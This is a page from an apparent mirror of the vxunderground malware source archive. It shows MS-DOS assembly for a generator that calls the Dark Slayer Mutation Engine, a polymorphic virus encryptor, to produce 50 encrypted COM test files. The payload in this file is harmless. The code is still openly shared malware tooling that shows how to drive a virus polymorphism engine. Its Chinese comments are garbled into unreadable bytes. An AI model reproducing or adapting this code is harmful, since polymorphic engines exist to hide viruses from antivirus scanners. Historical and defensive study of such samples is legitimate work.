Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-07-01 03:12:31 +00:00
Code Releases Activity
6e867b6ce0
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.dsme-gen.asm

119 lines
4.2 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-12 23:41:47 +00:00
; Dark Slayer Mutation Engine v1.0
; Written by Dark Slayer in Taiwan
DSME_GEN SEGMENT
ASSUME CS:DSME_GEN,DS:DSME_GEN
ORG 0100h
MSG_ADDR EQU OFFSET MSG-OFFSET PROC_START-0005h
EXTRN DSME:NEAR,DSME_END:NEAR
; <20>H<EFBFBD>U<EFBFBD>{<7B><><EFBFBD>A<EFBFBD><41><EFBFBD>F<EFBFBD>n<EFBFBD>`<60>N<EFBFBD><4E><EFBFBD>a<EFBFBD><EFBFBD>`<60>ѡA<D1A1><EFBFBD><E4A5A6><EFBFBD><EFBFBD><EFBFBD>ۤv<DBA4><76><EFBFBD>s
; you may get some information as following remarks
;
START:
MOV AH,09h
MOV DX,OFFSET DG_MSG
INT 21h
MOV AX,OFFSET DSME_END+000Fh ; <20><><EFBFBD>{<7B><> + DSME+000Fh <20><><EFBFBD><EFBFBD><E1AABA><EFBFBD>}
; <20>Y<EFBFBD><59> 0100h <20>h<EFBFBD><68><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>{<7B><> + DSME <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; This program + DSME+000Fh address
; Minus 0100h = this program + DSME
; lengh
MOV CL,04h
SHR AX,CL
MOV BX,CS
ADD BX,AX
MOV ES,BX ; <20>] ES <20>Ψө<CEA8><D3A9>ѽX<D1BD>{<7B><><EFBFBD>M<EFBFBD>Q<EFBFBD>s<EFBFBD>X<EFBFBD><58><EFBFBD><EFBFBD>
; <20>ѽX<D1BD>{<7B><><EFBFBD>̤j<CCA4><6A> 1024 Bytes
; <20>Y<EFBFBD>Φb<CEA6>`<60>n<EFBFBD>{<7B><><EFBFBD>ɡA<C9A1>h<EFBFBD><68><EFBFBD>`<60>N<EFBFBD><4E><EFBFBD>t<EFBFBD><74><EFBFBD>O<EFBFBD><4F><EFBFBD><EFBFBD><EFBFBD>j<EFBFBD>p
; Setting ES to put decryptor and encrypted
; code.
; Decryptor maxium is 1024 bytes
; You should notice the allocation of memory
; size when you use DSME in resident mode.
MOV CX,50
DG_L0:
PUSH CX
MOV AH,3Ch
XOR CX,CX
MOV DX,OFFSET FILE_NAME
INT 21h
XCHG BX,AX
MOV BP,0100h ; <20>ѽX<D1BD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}
; <20>ΨӼg<D3BC>r<EFBFBD>ɫh<C9AB>̱<EFBFBD><CCB1>P<EFBFBD>V<EFBFBD>ɮפ<C9AE><D7A4>j<EFBFBD>p<EFBFBD>ӳ]
; Offset where the decryption routine
; will be executed
; It depends on which kinds of files
; COM or EXE?
MOV CX,OFFSET PROC_END-OFFSET PROC_START ; <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; encrypted code
; lengh
MOV DX,OFFSET PROC_START ; DS:DX -> <20>n<EFBFBD>Q<EFBFBD>s<EFBFBD>X<EFBFBD><58><EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD>}
; DS:DX -> Encrypted code's
; address
PUSH BX ; <20>O<EFBFBD>s File handle
; keep File handle
MOV BL,00h ; COM <20>Ҧ<EFBFBD>
; COM mode
CALL DSME
POP BX
MOV AH,40h ; <20><><EFBFBD>^<5E><> DS:DX = <20>ѽX<D1BD>{<7B><> + <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}
INT 21h ; CX = <20>ѽX<D1BD>{<7B><> + <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>סA<D7A1><EFBFBD>Ȧs<C8A6><73><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; When returning from DSME,
; DS:DX = decryptor + encrypted code's address
; CX = lengh of decryptor + encrypted code
; Other registers won't be changed.
MOV AH,3Eh
INT 21h
PUSH CS
POP DS ; <20>N DS <20>]<5D>^<5E><>
; restore DS
MOV BX,OFFSET FILE_NUM
INC BYTE PTR DS:[BX+0001h]
CMP BYTE PTR DS:[BX+0001h],'9'
JBE DG_L1
INC BYTE PTR DS:[BX]
MOV BYTE PTR DS:[BX+0001h],'0'
DG_L1:
POP CX
LOOP DG_L0
MOV AH,4Ch
INT 21h
FILE_NAME DB '000000'
FILE_NUM DB '00.COM',00h
DG_MSG DB 'Generates 50 DSME encrypted test files.',0Dh,0Ah,'$'
PROC_START:
MOV AH,09h
CALL $+0003h
POP DX
ADD DX,MSG_ADDR
INT 21h
INT 20h
MSG DB 'this is <DSME> test file.$'
PROC_END:
DSME_GEN ENDS
END START

Copy Permalink